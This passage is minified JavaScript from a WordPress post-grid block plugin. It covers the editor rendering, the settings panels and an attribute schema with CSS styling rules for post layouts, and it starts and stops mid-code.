e=`${ve}`,t=(e,t)=>(0,b.o6)()&&Be&&(0,o.createElement)(h.Z,{idx:e,postId:t,fields:Ue,settingsOnClick:(e,t)=>{e?.stopPropagation(),Ve(t)},selectedDC:l.selectedDC,setSelectedDc:ze,setAttributes:A,dcFields:Ue});return l.error?(0,o.createElement)(P,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(S,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-${me}`},l.postsList.map(((l,a)=>{const r=0==a||3==a?JSON.parse(le.replaceAll("u0022",'"')):JSON.parse(oe.replaceAll("u0022",'"')),c=0==a?Ee:Se;return(0,o.createElement)(e,{key:a,className:`ultp-block-item post-id-${l.ID} ultp-block-item-${a} ${ge?"ultp-animation-"+ge:""}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap ultp-block-content-overlay"},(0,o.createElement)(s.En,{imgOverlay:te,imgOverlayType:ee,imgAnimation:Q,post:l,fallbackEnable:Pe,vidIconEnable:Le,catPosition:J,showImage:G,idx:a,showSmallCat:ae,imgSize:c,layout:me,Category:(0==a||ae||3==a&&"layout4"==me)&&"aboveTitle"!=J?(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:V,catStyle:K,catPosition:J,customCatColor:ye,onlyCatColor:be,onClick:e=>{We("taxonomy-/-category"),Ve("cat")}})):null,onClick:()=>{We("image"),Ve("image")}}),Le&&l.has_video&&(0,o.createElement)(s.nk,{onClick:()=>{We("video"),Ve("video")}}),(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${se}`},(0,o.createElement)("div",{className:"ultp-block-content-inner"},t(7,l.ID),"aboveTitle"==J&&(0==a||ae||3==a&&"layout4"==me)&&(0,o.createElement)(i.Z,{post:l,catShow:V,catStyle:K,catPosition:J,customCatColor:ye,onlyCatColor:be,onClick:e=>{We("taxonomy-/-category"),Ve("cat")}}),t(6,l.ID),l.title&&$&&1==Y&&(0,o.createElement)(d.Z,{title:l.title,headingTag:he,titleLength:ke,titleStyle:Te,onClick:e=>{We("title"),Ve("title")}}),t(5,l.ID),W&&"top"==ue&&(0,o.createElement)(p.Z,{meta:r,post:l,metaSeparator:q,metaStyle:F,metaMinText:we,metaAuthorPrefix:xe,metaDateFormat:_e,authorLink:Ce,onClick:e=>{We("meta"),Ve("meta")}}),t(4,l.ID),l.title&&$&&0==Y&&(0,o.createElement)(d.Z,{title:l.title,headingTag:he,titleLength:ke,titleStyle:Te,onClick:e=>{We("title"),Ve("title")}}),t(3,l.ID),(0==a||ce||3==a&&"layout4"==me)&&X&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:z,showFullExcerpt:de,showSeoMeta:fe,onClick:e=>{We("excerpt"),Ve("excerpt")}}),t(2,l.ID),(0==a||pe||3==a&&"layout4"==me)&&ie&&(0,o.createElement)(u.Z,{readMoreText:ne,readMoreIcon:re,titleLabel:l.title,onClick:()=>{We("read-more"),Ve("read-more")}}),t(1,l.ID),W&&"bottom"==ue&&(0,o.createElement)(p.Z,{meta:r,post:l,metaSeparator:q,metaStyle:F,metaMinText:we,metaAuthorPrefix:xe,metaDateFormat:_e,authorLink:Ce,onClick:e=>{We("meta"),Ve("meta")}}),t(0,l.ID),(0,b.o6)()&&Be&&(0,o.createElement)(v.Z,{dcFields:Ue,setAttributes:A,startOnboarding:Fe,overlayMode:!0,inverseColor:!0})))))}))):(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:Ie})}(),He&&"navigation"==Ze&&"topRight"!=Oe&&(0,o.createElement)(c.Z,{onClick:()=>{We("pagination"),Ve("pagination")}}))))}},11070:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(69735),p=l(82473),c=l(87282),u=l(87025),d=l(92637),m=l(43581);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8,b=e=>{const{store:t}=e,{queryType:l,advFilterEnable:n,advPaginationEnable:r,V4_1_0_CompCheck:{runComp:s}}=t.attributes,{context:p,section:y,settingTab:b,setSettingTab:v}=t;return g((()=>{(0,u.CH)(p,n,t,r)}),[n,r,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(m.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6835",store:t}),(0,o.createElement)(d.Sections,{settingTab:b,setSettingTab:v},(0,o.createElement)(d.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,exclude:["queryNumber","queryNumPosts"],store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:c.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:c.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(d.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:!0,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns","queryNumber","queryNumPosts"],include:[{position:0,data:{type:"layout",block:"post-grid-7",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pg7/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg7/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pg7/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pg7/l4.svg",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0}]}},{position:3,data:{type:"range",key:"overlayHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")}},{position:13,data:{type:"range",key:"queryNumber",min:0,max:4,label:__("Number of Post","ultimate-post")}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:y.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],hrIdx:[4,10]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:y.image,include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin","imgWidth","imageScale","imgHeight"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,depend:"metaShow",initialOpen:y.meta,exclude:["metaSeparator","metaStyle","metaList","metaListSmall"],include:[{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:y["taxonomy-/-category"],depend:"catShow",store:t,exclude:["catPosition"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:y.excerpt,store:t,include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],hrIdx:[4,7]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:y["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:y.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.fm,{store:t,include:a.aG}),!s&&(0,o.createElement)(i.Z,{open:y.filter||y.pagination||y.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:y.heading,depend:"headingShow"}),"posts"!=l&&"customPosts"!=l&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:y.filter,depend:"filterShow",exclude:["filterType","filterValue"],include:[{position:2,data:a.YA},{position:3,data:a.sx}],hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,initialOpen:y.pagination,depend:"paginationShow",store:t,include:[{position:3,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:3,data:a.dT}],exclude:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition","pagiMargin"],hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(d.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:c,titleShow:u,catPosition:d,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,u&&0==m,i&&"top"==b,u&&1==m,f&&"aboveTitle"==d];if((0,s.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(p.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,incSettings:[{position:1,data:a.YA},{position:2,data:a.sx}],exSettings:["filterType","filterValue"],exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["navMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,incSettings:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exStyle:["pagiTypo","pagiMargin","pagiPadding","navMargin"],exSettings:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleTypo","titleColor","titleHoverColor","titleBackground"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"],exSettings:["metaSeparator","metaStyle","metaList","metaListSmall"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catPosition","catTypo","catSacing","catPadding"],exSettings:["catPosition"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exSettings:["imgMargin","imgWidth","imageScale","imgHeight"],exStyle:["imgMargin","imgWidth","imageScale","imgHeight"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},37602:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},columnGridGap:{type:"object",default:{lg:"5",unit:"px"},style:[{selector:"{{ULTP}} .ultp-layout1 .ultp-block-item:first-child .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout1 .ultp-block-item:nth-child(2) .ultp-block-content-overlay { height: calc(100% + {{columnGridGap}}); } \n          {{ULTP}} .ultp-block-row { grid-row-gap: {{columnGridGap}}; } \n          {{ULTP}} .ultp-block-row {grid-column-gap: {{columnGridGap}}; }"}]},overlayHeight:{type:"object",default:{lg:"500",unit:"px"},style:[{selector:"{{ULTP}} .ultp-layout4 .ultp-block-item:nth-child(2) .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout4 .ultp-block-item:nth-child(3) .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout1 .ultp-block-item:nth-child(3) .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout1 .ultp-block-item:nth-child(4) .ultp-block-content-overlay {height: calc({{overlayHeight}}/2);} \n          {{ULTP}} .ultp-layout1 .ultp-block-item:first-child, \n          {{ULTP}} .ultp-layout1 .ultp-block-item:nth-child(2) {max-height: {{overlayHeight}};} \n          {{ULTP}} .ultp-block-row {max-height: {{overlayHeight}};} \n          {{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-empty-image, \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-image img, \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-empty-image {width: 100%; object-fit: cover; height: 100%; } \n          {{ULTP}} .ultp-layout3 .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-layout2 .ultp-block-item .ultp-block-image img {height: {{overlayHeight}};} \n          {{ULTP}} .ultp-layout1 .ultp-block-item:nth-child(2) .ultp-block-image img {min-height: {{overlayHeight}};} \n          @media (max-width: 768px) { \n            {{ULTP}} .ultp-block-item .ultp-block-content-overlay .ultp-block-image img, \n            {{ULTP}} .ultp-block-content-overlay .ultp-block-empty-image { height: calc( {{overlayHeight}}/2 ); min-height: inherit;}\n          }"}]},queryNumber:{type:"string",default:"4",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},titleShow:{type:"boolean",default:!0},titleTag:{type:"string",default:"h3"},titleAnimation:{type:"string",default:""},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"rgba(255,255,255,0.70)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"28",xs:"18",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",family:"",weight:"700"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a, \n          {{ULTP}} .ultp-layout4 .ultp-block-item:nth-child(4) .ultp-block-title, \n          {{ULTP}} .ultp-layout4 .ultp-block-item:nth-child(4) .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",xs:"14",unit:"px"},height:{lg:"26",unit:"px"},decoration:"none",family:"",weight:"600"},style:[{depends:[{key:"titleShow",condition:"==",value:!0},{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap:not(.ultp-layout4) .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-items-wrap:not(.ultp-layout4) .ultp-block-item:not(:first-child) .ultp-block-title a, \n          {{ULTP}} .ultp-layout4 .ultp-block-item:not(:first-child):not(:nth-child(4)) .ultp-block-title, \n          {{ULTP}} .ultp-layout4 .ultp-block-item:not(:first-child):not(:nth-child(4)) .ultp-block-title a "}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},showImage:{type:"boolean",default:!0},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"gridStyle",condition:"!=",value:"style1"}]}]},imgAnimation:{type:"string",default:"zoomIn"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap, \n          {{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap:hover, \n          {{ULTP}} .ultp-block-content-wrap:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-overlay"}]},imgOverlay:{type:"boolean",default:!0},imgOverlayType:{type:"string",default:"simgleGradient",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallBtn:{type:"boolean",default:!1},metaListSmall:{type:"string",default:'["metaDate"]'},showSmallCat:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:15,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-end;} \n          .rtl {{ULTP}} .ultp-block-meta {justify-content: start;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:".rtl {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse; justify-content: flex-end;}"}]},overlayContentPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"overlayContentPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},overlayBgColor:{type:"object",default:{openColor:1,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},overlayWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{overlayWrapPadding}}; }"}]},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s 